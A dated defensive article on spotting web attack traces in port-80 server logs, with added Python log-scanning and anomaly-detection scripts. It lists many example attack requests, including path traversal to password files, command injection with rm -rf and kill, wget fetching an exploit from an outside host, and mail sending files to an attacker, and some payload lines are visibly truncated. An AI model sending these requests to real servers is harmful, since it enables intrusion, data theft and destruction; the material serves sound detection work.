I. Abstract
II. Detail
III. Further
IV. Overflow Analysis
V. Transcoding
VI. Conclusion
[Abstract]
Web sites served on the default port 80 continue to have security problems disclosed for them, and some of these vulnerabilities allow an attacker to obtain system administrator privileges on the host running the site. The following is Zenomorph's research into the traces that attack patterns leave on port 80, and it tells you how to find the problem in your log records.
[Detail]
This section uses a number of examples to show common attacks on web servers and web applications, and the traces they leave. The examples cover only the major attacks, not every form of attack. Each attack is described in detail, along with how its vulnerability is exploited.
(1) ".", ".." and "..." requests
Traces of these attacks are very common against web applications and web servers. An attacker or worm uses them to break out of the web server's path and gain access to closed areas. Most CGI programs with this flaw are hit with the ".." request.
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
This example shows the attacker requesting the file motd. If the attacker is able to break out of the web server's root directory, he can obtain more information and go on to gain further privileges.
(2) "%20" request
%20 is the hexadecimal value of a space character. On its own it does not mean anything is wrong, and you will see it often when viewing logs, but some applications running on the web server may effectively execute what follows it, so you should review the log carefully. On the other hand, this request can sometimes help to execute commands.
Example:
http://host/cgi-bin/lame.cgi?page=ls%20-al|
This example shows the attacker trying to execute the unix command ls to list all the files in the directory, which gives the attacker access to important files on your system and helps him obtain privileges.
(3) "%00" request
%00 is the hexadecimal value of a null byte. It can fool a web application into serving a different type of file than it intends.
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
This may be a valid request on the machine. If the attacker notices that this request succeeds, he will look further into the cgi program.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
The cgi program may not accept this request because it checks the suffix of the requested file name, such as .html, .shtml or another file type. Most programs will tell you that the requested file type is invalid, which tells the attacker that the requested file must have a certain suffix; the error may also reveal the system path and file names, leaking more sensitive information about your system.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
Pay attention to this request: it cheats the cgi program into deciding that the file is of an acceptable type. Some applications check the requested file this poorly, and this is a method attackers commonly use.
(4) "|" request
This is the pipe character. On unix systems it is used in a request to execute several system commands at once.
Example:
# cat access_log | grep -i ".."
(This command displays the ".." requests in the log, which are commonly found in attacks and worms)
Many web applications use this character legitimately, which also leads to false alarms in the IDS logs. Examine your applications carefully; that is the way to reduce false alarms in your intrusion detection system.
Here are some examples:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
This request executes the ls command. The following are some variations:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|
This request lists all the files in the unix system's /etc directory.
http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20"lame"
This request executes the cat command and then the grep command, searching the output for "lame".
(5) ";" request
On unix systems this character allows multiple commands to be executed on one command line.
Example:
# id; uname -a
(Executes the id command, followed by the uname command)
Some web programs use this character, which may cause false alarms in your IDS logs. Check your web programs carefully so you reduce the risk of false IDS alerts.
(6) "<" and ">" requests
You should check your logs for these two characters for a number of reasons. The first is that these characters are used to write data into a file.
Example 1:
# echo "your hax0red h0 h0" >> /etc/motd (writes that text into the motd file)
An attacker can easily use a request like the above to tamper with your web page, as with the famous RDS exploit that attackers often used to change web pages.
Example 2:
http://host/something.php=Hi%20mom%20Im%20Bold!
You will notice the HTML markup here, which also uses the "<" and ">" characters. Such attacks do not give the attacker access to the system, but they confuse people into thinking the content is legitimate information from the web site (leading people who visit this link to the address the attacker set up). The request may be encoded as hex characters so that the traces of the attack are not so obvious.
(7) "!" request
This character is commonly used in SSI (Server Side Include) attacks. As in the case above, the attacker confuses a user into clicking a link the attacker set up.
Example:
http://host1/something.php =
This example is an attack that makes a file from host2 appear on host1 (of course, it requires the visitor to visit the link the attacker set up). The request may be converted into hex encoding to mask it, so it is not easily found.
At the same time, this approach can also execute commands with the web site's privileges.
Example:
http://host/something.php =
This example runs the "id" command on the remote system, which displays the web site user's id, usually "nobody" or "www".
This form also allows hidden files to be included.
Example:
http://host/something.php =
The hidden file .htpasswd would normally not be displayed, because Apache has a rule that refuses requests for .ht* files, but the SSI tag bypasses that restriction and leads to security problems.
(8) "," request
Such attacks attempt to insert PHP code into a web application remotely. It may allow command execution, depending on the server settings and other factors (such as whether php is set to safe mode).
Example: http://host/something.php = passthru ("id ");?>
In some simple php applications, this may execute local commands on the remote system with the web site user's rights.
(9) "`" request
This character is used to execute commands in perl. It is not often used in web applications, so if you see it in your log you should be very careful.
Example:
http://host/something.cgi = `id`
A badly written perl cgi program would execute the id command.
[Further]
The following section discusses more commands that attacks could execute, together with the files they request, and how examining the log reveals a remote command execution flaw if you have one. This part is just meant to give you a good idea of what is happening on your system and the traces attackers leave when trying to attack it; it does not list every command and request an attacker may use.
"/bin/ls"
This request uses the command's full path, and many web applications have this loophole. If your log shows such requests in many places, you may well have a remote command execution vulnerability, though it is not necessarily a problem and may also be a false alarm. Once again, the way web applications are written (cgi, asp, php, etc.) is the basis of security.
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;
"cmd.exe"
This is the windows shell. If an attacker can reach and run it, and the server settings allow it, he can do anything on the windows machine. Many worms communicate with remote machines through port 80 this way.
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/bin/id"
This is also a binary, and the problem is the same as with /bin/ls: if you see such requests in many places in your log, you may well have a remote command execution vulnerability, though it is not necessarily a problem and may also be a false alarm.
It shows which user and group the process belongs to.
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
"/bin/rm"
This command deletes files; used incorrectly it is very dangerous.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
"wget and tftp" commands
Attackers often use these commands to download files that may gain them further privileges. wget is a unix command that may be used to download backdoors; tftp exists on both unix and nt and is used to download files. Some IIS worms spread by copying themselves to other hosts with tftp.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c;
"cat" command
This command views the contents of a file. It is used to read important information such as configuration files, password files, credit files and any other document you can think of.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd|
http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
"echo" command
This command writes data to a file, such as "index.html".
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt|
http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt;
"ps" command
Lists the currently running processes. It tells the attacker what software the remote host is running, so he can get an idea of its security issues and obtain further permissions.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux|
http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
"kill and killall" commands
On unix systems these kill processes. An attacker can use them to stop system services and processes, and also to erase the traces of the attack; some exploits produce a lot of child processes.
Examples:
http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200|
http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
"uname" command
This command tells the attacker the remote machine's name. Sometimes the attacker wants to know, from the web site, which isp it belongs to; perhaps the attacker has had access there before. The request is normally uname -a, and it will be recorded in the log file.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a|
http://host/cgi-bin/bad.cgi?doh=uname%20-a;
"cc, gcc, perl, python, etc." compilers and interpreters
An attacker downloads an exploit with wget or tftp, then uses the cc or gcc compiler to compile it into an executable program and gain further privileges.
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337;
If you find "perl" or "python" in your logs, a remote attacker may have downloaded perl or python scripts and tried to gain local privileges.
"mail" command
Attackers often use this command to send important system files to their own mailbox; they are also willing to carry out e-mail bomb attacks with it.
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@fuckcnhonker.org%20<
2.168.22.1;
"chown, chmod, chgrp, chsh, etc." and other commands
These commands change file permissions on a unix system:
chown = sets the owner of a file
chmod = sets the permissions of a file
chgrp = changes the group that owns a file
chsh = changes the user's shell
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.html|
http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html;
http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd|
http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh;
http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/shadow|
"/etc/passwd" file
This is the system's password file. It is usually shadowed and does not reveal the encrypted passwords, but an attacker can learn from it which users are valid, the system's absolute paths, site names and other information. Since it is usually shadowed, the attacker will normally look at the /etc/shadow file next.
"/etc/master.passwd"
This is the BSD system's password file and contains the encrypted passwords. The file is readable only by the root account, and some unskilled attackers attempt to read its contents anyway. If the web site runs with root privileges, the attacker can read it, and many problems will come one after another for the system administrator.
"/etc/shadow"
Contains the system's encrypted passwords and is readable only by the root account, much like /etc/master.passwd.
"/etc/motd"
When users log into a unix system, the "Message of the Day" file is displayed. It provides important system information and notices the administrator has set for users, whether they want to see them or not, and often contains the system version. The attacker usually views this file to learn what system is running, then searches for exploits for that type of system and goes on to gain system privileges.
"/etc/hosts"
This file provides ip addresses and network information; an attacker can learn more about the system's network settings from it.
"/usr/local/apache/conf/httpd.conf"
This is the Apache web server configuration file; an attacker can learn from it whether cgi, ssi and other features are accessible.
"/etc/inetd.conf"
This is the inetd service configuration file. An attacker can learn which services the remote machine starts and whether a wrapper is used for access control. If a wrapper is found running, the attacker's next step is to check the "/etc/hosts.allow" and "/etc/hosts.deny" files, and possibly change some settings to gain access privileges.
".htpasswd, .htaccess and .htgroup"
These files are typically used for web site user authentication. An attacker would view them to obtain user names and passwords. The passwords in .htpasswd are encrypted, but after a simple cracking process an attacker can access the protected areas of the site (users usually reuse the same user name and password, so the attacker may even get into other accounts).
"access_log and error_log"
These are the apache server log files. Attackers often view them to see which requests have been recorded and which requests look different from the rest.
Typically the attacker will then modify these log files, for example the entries carrying his own address. If the attacker came in through port 80 and your system makes no backups and has no other program recording the system's state, intrusion detection becomes very difficult.
"[drive-letter]:\winnt\repair\sam._ or [drive-letter]:\winnt\repair\sam"
This is the Windows NT system password file. If remote command execution is not possible, attackers will usually request these files and then crack them with a password cracking tool of the "l0pht crack" type. If the attacker succeeds in cracking the administrator's password, the remote machine falls under his control.
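As an added example (not part of Zenomorph's article), the following Python script applies the traces from sections (1) to (9) and the command and file names listed in this section to Apache access_log lines: it parses each line, undoes the hex transcoding before matching, and tags bare metacharacters as low confidence because of the false-alarm caveat above. The log lines are constructed, and the log-format regex, signature names and confidence labels are this example's own, not the article's.

```python
"""Added example: scan Apache access_log lines for the port-80 traces listed above."""
import re
from urllib.parse import unquote
# Common/combined log format: client ... [time] "METHOD request-target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

# (label, pattern applied to the DECODED request-target, confidence). Bare
# metacharacters are "low": as the text notes, legitimate applications use them too.
SIGNATURES = [
    ("traversal", re.compile(r"\.\./"), "high"),
    ("null-byte", re.compile("\x00"), "high"),           # a decoded %00
    ("ssi-tag", re.compile(r"<!--#"), "high"),            # the SSI "!" request
    ("php-tag", re.compile(r"<\?|passthru\("), "high"),   # <? is PHP's open tag
    ("cmd.exe", re.compile(r"cmd\.exe", re.I), "high"),
    ("command", re.compile(
        r"(?:^|[/=;|` ])(?:ls|id|rm|wget|tftp|cat|echo|ps|kill(?:all)?|uname|cc|gcc"
        r"|perl|python|mail|ch(?:own|mod|grp|sh))(?:[ ;|]|$)"), "high"),
    ("sensitive-file", re.compile(
        r"/etc/(?:passwd|shadow|master\.passwd|motd|hosts|inetd\.conf)|httpd\.conf"
        r"|\.ht(?:passwd|access|group)|access_log|error_log|repair[/\\]sam", re.I), "high"),
    ("shell-meta", re.compile(r"[|;`<>]"), "low"),
]

def decode_request(target):
    """Undo the hex transcoding. Decoding twice also normalises double-encoded
    requests such as %252e (-> %2e -> '.') that a single pass would miss."""
    return unquote(unquote(target))

def scan_line(line):
    """Parse one log line; return (client, status, decoded_target, hits) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    decoded = decode_request(target)
    hits = [(label, conf) for label, rx, conf in SIGNATURES if rx.search(decoded)]
    return client, int(status), decoded, hits

def scan_log(lines):
    """Return only the entries that triggered at least one signature."""
    return [r for r in map(scan_line, lines) if r and r[3]]

# Constructed sample lines (not from a real server); the request-targets follow the text above.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2001:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326',
    '10.0.0.9 - - [10/Oct/2001:13:56:01 -0700] "GET /cgi-bin/lame.cgi?file=../../../../etc/motd HTTP/1.0" 200 512',
    '10.0.0.9 - - [10/Oct/2001:13:56:40 -0700] "GET /cgi-bin/lame.cgi?page=ls%20-al| HTTP/1.0" 200 1804',
    '10.0.0.9 - - [10/Oct/2001:13:57:02 -0700] "GET /cgi-bin/lame.cgi?page=..%252F..%252Fetc/passwd%2500html HTTP/1.0" 200 900',
    '10.0.0.12 - - [10/Oct/2001:13:58:10 -0700] "GET /scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e: HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for client, status, decoded, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {status} {decoded!r} -> {hits}")
```

Because matching runs on the decoded request-target, the double-encoded fourth line is flagged for traversal, the null byte and the password file even though none of those strings appear literally in the log.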
[Overflow analysis]
In this article I will not say much about overflows; I will point out the phenomena and traces that are noteworthy and of particular concern. Buffer overflow attacks are sometimes hidden by the attacker with transcoding and other means, which makes them difficult to find.
Here is a simple example:
Example: http://host/cgi-bin/helloworld?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This example shows the attacker sending a large number of A characters to an application to test it for a buffer overflow. A buffer overflow can give remote command execution on the host; if the program is setuid root, the overflow can give access to the entire system, and if it is not setuid, the overflow runs only with the web site user's rights.
Not every circumstance can be described here, but you should regularly check your log files. If one day you suddenly find a lot of requests that are not normally there, it may mean you are under an overflow attack; of course, it may also be a new network worm.
[Transcoding]
For all the requests mentioned above, the attacker usually knows that IDS systems check requests mechanically, so he will use a data conversion tool to convert the request into hex encoding, causing the IDS to ignore it. The familiar CGI vulnerability scanner Whisker is a good example of this. If you find many hex-encoded and otherwise uncommon characters when viewing your log, an attacker may be trying to attack your system in some way.
A fast way to find out what the request was is to copy the hex-encoded request from your log file into your browser; the browser converts it into the correct request and displays the requested content. If you do not have the courage to take that risk, a simple man ascii will give you the correct codes.
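As an added example (not from the article), this Python code turns the two observations above into measurable indicators: the length and the longest repeated-character run of a request for the overflow case, and the proportion of hex escapes plus the number of decoding layers for the transcoding case. The request-targets and the thresholds are constructed for illustration and are not values the article gives.

```python
"""Added example: anomaly indicators for the overflow and transcoding sections above."""
from urllib.parse import unquote

def longest_run(s):
    """Return (char, length) of the longest run of one repeated character;
    probes such as helloworld?type=AAAA... stand out by this measure."""
    best, cur = ("", 0), ("", 0)
    for ch in s:
        cur = (ch, cur[1] + 1) if ch == cur[0] else (ch, 1)
        if cur[1] > best[1]:
            best = cur
    return best

def percent_density(target):
    """Approximate fraction of the request-target made of %XX escapes. Normal
    requests encode a few spaces; a Whisker-style request encodes nearly every letter."""
    return 3 * target.count("%") / len(target) if target else 0.0

def decode_layers(target, limit=5):
    """Apply unquote until the text stops changing; return (decoded, layers).
    layers > 1 means the request was double-encoded to slip past an IDS."""
    layers = 0
    while layers < limit:
        decoded = unquote(target)
        if decoded == target:
            break
        target, layers = decoded, layers + 1
    return target, layers

def assess(target, max_len=256, run_min=64, density_min=0.5):
    """Return the reasons (possibly none) a request-target deserves a closer look."""
    reasons = []
    decoded, layers = decode_layers(target)
    ch, run = longest_run(decoded)
    if len(decoded) > max_len:
        reasons.append(f"length {len(decoded)} > {max_len}")
    if run >= run_min:
        reasons.append(f"run of {run} x {ch!r}")
    if percent_density(target) >= density_min:
        reasons.append(f"{percent_density(target):.0%} hex-encoded")
    if layers > 1:
        reasons.append(f"{layers} encoding layers")
    return reasons

# Constructed request-targets (not from a real log) modelled on the text above.
SAMPLES = {
    "normal": "/cgi-bin/lame.cgi?page=index.html",
    "overflow": "/cgi-bin/helloworld?type=" + "A" * 400,
    "whisker": "/%63%67%69%2d%62%69%6e/%6c%61%6d%65%2e%63%67%69?%66%69%6c%65=%2e%2e%2f%2e%2e%2f%65%74%63%2f%6d%6f%74%64",
    "double": "/cgi-bin/lame.cgi?page=%252e%252e%252f%252e%252e%252fetc%252fmotd",
}

if __name__ == "__main__":
    for name, target in SAMPLES.items():
        print(f"{name}: {assess(target) or ['clean']}")
```

The thresholds should be tuned against a baseline of your own normal traffic; the point is that neither indicator depends on recognising a specific command or file name.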
[Conclusion]
This article cannot cover every attack on port 80, but the list above covers the most common ones, and it tells you how to check your log files and how to add some IDS rules. It is meant to give web system administrators a good idea of what to be concerned about; at the same time, I hope this article helps web developers write better programs.
Note: If you have any comments or suggestions, please send an e-mail to admin@cgisecurity.com.